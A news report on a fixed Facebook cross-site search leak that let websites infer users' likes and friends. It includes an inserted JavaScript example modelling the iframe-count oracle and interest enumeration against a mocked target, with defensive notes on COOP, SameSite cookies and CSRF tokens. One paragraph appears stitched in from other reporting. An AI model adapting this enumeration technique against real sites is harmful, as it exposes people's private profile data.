Facebook vulnerability could have let websites obtain users' interests


Facebook says it has fixed a privacy bug that allowed websites to read likes and interests on users' profiles without them knowing about it.

Imperva researcher Ron Masas realized that simply by checking whether the search results page contained an iframe, he could tell whether a given search query had returned results or not.

Facebook fixed the issue in May and there's no indication that the flaw was successfully exploited by hackers.

Masas told ZDNet that an attacker could use a technique called "tab under" to force the Facebook Search page to open in a background tab, which keeps the user's focus on the main malicious page, which could be disguised as an online game, movie streaming portal, or news article.
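To make the mechanism concrete, here is an added example (not code from the article, from Imperva or from Facebook) that models the leak in plain JavaScript. The browser APIs involved (window.open, the cross-origin-readable frames.length) are replaced by a constructed mock target so it runs offline under Node; the search URL, the profile data and the "likes:"/"friends:" query syntax are all hypothetical. The point it shows is that a results page which renders an iframe only when a query matches turns into a yes/no oracle for any origin that holds a window reference to it, and that this oracle can be asked many questions in a row.

```javascript
// Added example, not the article's or Imperva's code. Browser APIs are mocked
// so the attack logic can be run and tested offline in Node.
//
// Background (per the HTML spec): a cross-origin Window reference exposes very
// little, but `length` (the number of child frames) IS readable. If the target's
// search results page renders an <iframe> only when a query has hits, then
// frames.length > 0 means "yes" and frames.length === 0 means "no".

// Constructed, hypothetical victim profile the mock target "knows".
const MOCK_PROFILE = {
  likes: new Set(['hiking', 'jazz']),
  friends: new Set(['alice']),
};

// Mock of the vulnerable results page: how many iframes would it render?
function mockSearchPage(query) {
  const m = /^(likes|friends):(.+)$/.exec(query);
  const hit = m !== null && MOCK_PROFILE[m[1]].has(m[2]);
  return hit ? 1 : 0;
}

// Mock of window.open(): the opener gets a cross-origin WindowProxy on which
// only a handful of properties (frames.length, closed, ...) are accessible.
// The real attack opened this in a background tab ("tab-under"); focus is not
// modelled here.
function mockOpen(url) {
  const q = new URL(url).searchParams.get('q');
  return { frames: { length: mockSearchPage(q) }, closed: false };
}

// Same target after it deploys Cross-Origin-Opener-Policy: same-origin. The
// opener's reference is severed, so it sees closed === true and no frames
// regardless of the query, and the oracle is gone.
function mockOpenWithCoop(_url) {
  return { frames: { length: 0 }, closed: true };
}

// The oracle: open the search URL, read the frame count, answer yes/no.
// Returns null when the reference is severed (leak closed).
function queryOracle(open, baseUrl, query) {
  const win = open(`${baseUrl}?q=${encodeURIComponent(query)}`);
  if (win.closed) return null;
  return win.frames.length > 0;
}

// Turn the binary oracle into enumeration: ask one candidate at a time.
function enumerateInterests(open, baseUrl, candidates) {
  const found = [];
  for (const c of candidates) {
    const answer = queryOracle(open, baseUrl, `likes:${c}`);
    if (answer === null) return null; // target is no longer leaking
    if (answer) found.push(c);
  }
  return found;
}

// Stand-alone demo against the hypothetical target.
const BASE = 'https://target.example/search';
console.log('leaked likes:', enumerateInterests(mockOpen, BASE, ['hiking', 'jazz', 'chess']));
console.log('after COOP:', enumerateInterests(mockOpenWithCoop, BASE, ['hiking']));
```

The mock makes the defensive lesson visible as well: the fix is not to hide the iframe but to deny the attacker a usable reference or a valid session. Cross-Origin-Opener-Policy on the target severs the opener relationship, SameSite cookies stop the background tab from carrying the victim's login, and a per-request CSRF token on the search endpoint makes forged queries fail before any results page is rendered.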

Ankush Johar, Director at Infosec Ventures, explained: "Although CSRF flaws have a big prerequisite to work, that the user must be logged in to the website while he/she visits the infected page, what makes the Facebook vulnerability risky is that, unlike with other websites, most users are always logged into Facebook in their browsers, thus putting everyone at massive risk".

Facebook is not the only company to have faced this type of issue, and it seems no one took advantage of this particular vulnerability. Notably, because the searches were issued from the victim's own browser, already authenticated to Facebook, they appeared to be conducted by the user, so the user's privacy settings did not limit what the results revealed.


This is the latest revelation in Facebook's bug-filled year. The bug allowed websites to obtain private information about Facebook users and their friends through unauthorized access to a company API, by playing off a specific behavior in the Chrome browser. It could also be used to search a user's posts for certain keywords, among other more complex queries, all of which are normally visible only to people on the user's friend list.

A video demonstrating how the hack works shows a pop-up window where the attackers type in the questions.

Even if these search queries didn't expose fine-grained details, they did expose second-hand information that, when pieced together, could reveal the identity of a user and their circle of friends.

Facebook said: "We appreciate this researcher's report to our bug bounty program".

The company awarded Imperva $8,000 in two separate bug bounty rewards.
